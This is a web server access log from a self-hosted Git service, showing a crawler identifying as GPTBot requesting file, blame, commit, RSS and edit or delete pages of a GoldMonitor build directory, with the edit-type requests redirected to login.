"https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:18:26:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:18:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:18:26:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:18:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:18:26:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:18:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:18:26:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:18:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:18:26:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:18:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:18:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11184] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:18:26:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:18:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:18:26:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:18:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:18:26:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:18:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:18:26:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:18:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:18:26:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:18:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:18:26:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:18:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:18:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:18:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:18:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:18:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:18:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:18:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:18:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:18:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:18:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 910] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:18:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 9813] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:18:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 153950] [Gzip 31.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:18:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 910] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:18:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 910] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:18:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 256461] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:18:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 151976] [Gzip 30.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:18:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 9813] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:18:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 153735] [Gzip 31.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:18:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 9813] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:18:26:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:18:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:18:26:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:18:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:18:26:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:18:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:18:26:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:18:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:18:26:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:18:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:18:26:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:18:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:18:26:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:18:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:18:26:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:18:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:18:26:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:18:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:18:26:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 